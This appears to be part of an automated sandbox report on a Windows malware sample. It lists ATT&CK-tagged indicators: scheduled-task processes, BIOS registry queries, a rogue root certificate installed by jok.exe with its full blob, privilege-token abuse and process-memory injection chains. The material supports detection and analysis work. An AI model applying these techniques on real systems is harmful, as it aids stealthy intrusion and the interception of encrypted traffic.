1540	schtasks.exe
3076	schtasks.exe
1504	schtasks.exe
2152	schtasks.exe
2272	schtasks.exe
3484	schtasks.exe
1748	schtasks.exe
2520	schtasks.exe
2852	schtasks.exe
4036	schtasks.exe
3360	schtasks.exe
2588	schtasks.exe
3784	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	lnfB347XiMLDThAET8cP8aEn.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"	lnfB347XiMLDThAET8cP8aEn.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	kHwixM0W4pufUOuFL9bbFg2C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	lnfB347XiMLDThAET8cP8aEn.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time"	lnfB347XiMLDThAET8cP8aEn.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time"	lnfB347XiMLDThAET8cP8aEn.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	lnfB347XiMLDThAET8cP8aEn.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	lnfB347XiMLDThAET8cP8aEn.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	YXZPFidGwUYbW3HBUdkjxo2P.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time"	lnfB347XiMLDThAET8cP8aEn.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	20r6ObZueJIz8FampZWGtc4C.exe
Key created	\REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	lnfB347XiMLDThAET8cP8aEn.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	jok.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	jok.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2540	explorta.exe
1936	amert.exe
2128	explorha.exe
2020	chrome.exe
2020	chrome.exe
1744	powershell.exe
3328	rundll32.exe
3328	rundll32.exe
3328	rundll32.exe
3328	rundll32.exe
3328	rundll32.exe
3328	rundll32.exe
3328	rundll32.exe
3328	rundll32.exe
3328	rundll32.exe
3328	rundll32.exe
3508	powershell.exe
1868	u1a0.0.exe
1868	u1a0.0.exe
1660	jok.exe
1944	YXZPFidGwUYbW3HBUdkjxo2P.exe
1944	YXZPFidGwUYbW3HBUdkjxo2P.exe
1944	YXZPFidGwUYbW3HBUdkjxo2P.exe
1144	lnfB347XiMLDThAET8cP8aEn.exe
1144	lnfB347XiMLDThAET8cP8aEn.exe
1144	lnfB347XiMLDThAET8cP8aEn.exe
2452	20r6ObZueJIz8FampZWGtc4C.exe
2452	20r6ObZueJIz8FampZWGtc4C.exe
2452	20r6ObZueJIz8FampZWGtc4C.exe
3004	kHwixM0W4pufUOuFL9bbFg2C.exe
3004	kHwixM0W4pufUOuFL9bbFg2C.exe
3004	kHwixM0W4pufUOuFL9bbFg2C.exe
3840	toolspub1.exe
3840	toolspub1.exe
1868	u1a0.0.exe
1868	u1a0.0.exe
1868	u1a0.0.exe
3856	20r6ObZueJIz8FampZWGtc4C.exe
3856	20r6ObZueJIz8FampZWGtc4C.exe
3856	20r6ObZueJIz8FampZWGtc4C.exe
3856	20r6ObZueJIz8FampZWGtc4C.exe
3856	20r6ObZueJIz8FampZWGtc4C.exe
3856	20r6ObZueJIz8FampZWGtc4C.exe
3856	20r6ObZueJIz8FampZWGtc4C.exe
3856	20r6ObZueJIz8FampZWGtc4C.exe
3856	20r6ObZueJIz8FampZWGtc4C.exe
3856	20r6ObZueJIz8FampZWGtc4C.exe
3856	20r6ObZueJIz8FampZWGtc4C.exe
3856	20r6ObZueJIz8FampZWGtc4C.exe
3856	20r6ObZueJIz8FampZWGtc4C.exe
3856	20r6ObZueJIz8FampZWGtc4C.exe
3856	20r6ObZueJIz8FampZWGtc4C.exe
3796	lnfB347XiMLDThAET8cP8aEn.exe
3796	lnfB347XiMLDThAET8cP8aEn.exe
3796	lnfB347XiMLDThAET8cP8aEn.exe
3796	lnfB347XiMLDThAET8cP8aEn.exe
3796	lnfB347XiMLDThAET8cP8aEn.exe
3796	lnfB347XiMLDThAET8cP8aEn.exe
3796	lnfB347XiMLDThAET8cP8aEn.exe
3796	lnfB347XiMLDThAET8cP8aEn.exe
3796	lnfB347XiMLDThAET8cP8aEn.exe
3796	lnfB347XiMLDThAET8cP8aEn.exe
3796	lnfB347XiMLDThAET8cP8aEn.exe
3796	lnfB347XiMLDThAET8cP8aEn.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
3840	toolspub1.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeDebugPrivilege	1744	powershell.exe
Token: SeDebugPrivilege	2000	CasPol.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeDebugPrivilege	3508	powershell.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeDebugPrivilege	1660	jok.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeDebugPrivilege	1944	YXZPFidGwUYbW3HBUdkjxo2P.exe
Token: SeImpersonatePrivilege	1944	YXZPFidGwUYbW3HBUdkjxo2P.exe
Token: SeDebugPrivilege	1144	lnfB347XiMLDThAET8cP8aEn.exe
Token: SeImpersonatePrivilege	1144	lnfB347XiMLDThAET8cP8aEn.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeDebugPrivilege	2452	20r6ObZueJIz8FampZWGtc4C.exe
Token: SeImpersonatePrivilege	2452	20r6ObZueJIz8FampZWGtc4C.exe
Token: SeDebugPrivilege	3004	kHwixM0W4pufUOuFL9bbFg2C.exe
Token: SeImpersonatePrivilege	3004	kHwixM0W4pufUOuFL9bbFg2C.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeDebugPrivilege	3268	4767d2e713f2021e8fe856e3ea638b58.exe
Token: SeImpersonatePrivilege	3268	4767d2e713f2021e8fe856e3ea638b58.exe
Token: SeShutdownPrivilege	2020	chrome.exe
Token: SeShutdownPrivilege	2020	chrome.exe

Suspicious use of FindShellTrayWindow 57 IoCs

pid	Process
2344	b682c3664db86649adee19d99ff7d141.exe
1936	amert.exe
2280	b0dcc639cc.exe
2280	b0dcc639cc.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2280	b0dcc639cc.exe
2280	b0dcc639cc.exe
2020	chrome.exe
2020	chrome.exe
2280	b0dcc639cc.exe
2280	b0dcc639cc.exe
2280	b0dcc639cc.exe
2280	b0dcc639cc.exe
2280	b0dcc639cc.exe
2280	b0dcc639cc.exe
2280	b0dcc639cc.exe
3680	u1a0.1.exe
3680	u1a0.1.exe
3680	u1a0.1.exe
3680	u1a0.1.exe
3680	u1a0.1.exe
3680	u1a0.1.exe
3680	u1a0.1.exe
3132	106364.exe

Suspicious use of SendNotifyMessage 50 IoCs

pid	Process
2280	b0dcc639cc.exe
2280	b0dcc639cc.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2020	chrome.exe
2280	b0dcc639cc.exe
2280	b0dcc639cc.exe
2280	b0dcc639cc.exe
2280	b0dcc639cc.exe
2280	b0dcc639cc.exe
2280	b0dcc639cc.exe
2280	b0dcc639cc.exe
2280	b0dcc639cc.exe
2280	b0dcc639cc.exe
3680	u1a0.1.exe
3680	u1a0.1.exe
3680	u1a0.1.exe
3680	u1a0.1.exe
3680	u1a0.1.exe
3680	u1a0.1.exe
3680	u1a0.1.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2344 wrote to memory of 2900	2344	b682c3664db86649adee19d99ff7d141.exe	28
PID 2344 wrote to memory of 2900	2344	b682c3664db86649adee19d99ff7d141.exe	28
PID 2344 wrote to memory of 2900	2344	b682c3664db86649adee19d99ff7d141.exe	28
PID 2344 wrote to memory of 2900	2344	b682c3664db86649adee19d99ff7d141.exe	28
PID 2900 wrote to memory of 2540	2900	explorta.exe	29
PID 2900 wrote to memory of 2540	2900	explorta.exe	29
PID 2900 wrote to memory of 2540	2900	explorta.exe	29
PID 2900 wrote to memory of 2540	2900	explorta.exe	29
PID 2900 wrote to memory of 2540	2900	explorta.exe	29
PID 2900 wrote to memory of 2540	2900	explorta.exe	29
PID 2900 wrote to memory of 2540	2900	explorta.exe	29
PID 2900 wrote to memory of 2540	2900	explorta.exe	29
PID 2900 wrote to memory of 2540	2900	explorta.exe	29
PID 2900 wrote to memory of 2540	2900	explorta.exe	29
PID 2900 wrote to memory of 2540	2900	explorta.exe	29
PID 2900 wrote to memory of 2540	2900	explorta.exe	29
PID 2900 wrote to memory of 2540	2900	explorta.exe	29
PID 2900 wrote to memory of 1936	2900	explorta.exe	51
PID 2900 wrote to memory of 1936	2900	explorta.exe	51
PID 2900 wrote to memory of 1936	2900	explorta.exe	51
PID 2900 wrote to memory of 1936	2900	explorta.exe	51
PID 1936 wrote to memory of 2128	1936	amert.exe	32
PID 1936 wrote to memory of 2128	1936	amert.exe	32
PID 1936 wrote to memory of 2128	1936	amert.exe	32
PID 1936 wrote to memory of 2128	1936	amert.exe	32
PID 2900 wrote to memory of 644	2900	explorta.exe	33
PID 2900 wrote to memory of 644	2900	explorta.exe	33
PID 2900 wrote to memory of 644	2900	explorta.exe	33
PID 2900 wrote to memory of 644	2900	explorta.exe	33
PID 2128 wrote to memory of 2264	2128	explorha.exe	34
PID 2128 wrote to memory of 2264	2128	explorha.exe	34
PID 2128 wrote to memory of 2264	2128	explorha.exe	34
PID 2128 wrote to memory of 2264	2128	explorha.exe	34
PID 2128 wrote to memory of 2264	2128	explorha.exe	34
PID 2128 wrote to memory of 2264	2128	explorha.exe	34
PID 2128 wrote to memory of 2264	2128	explorha.exe	34
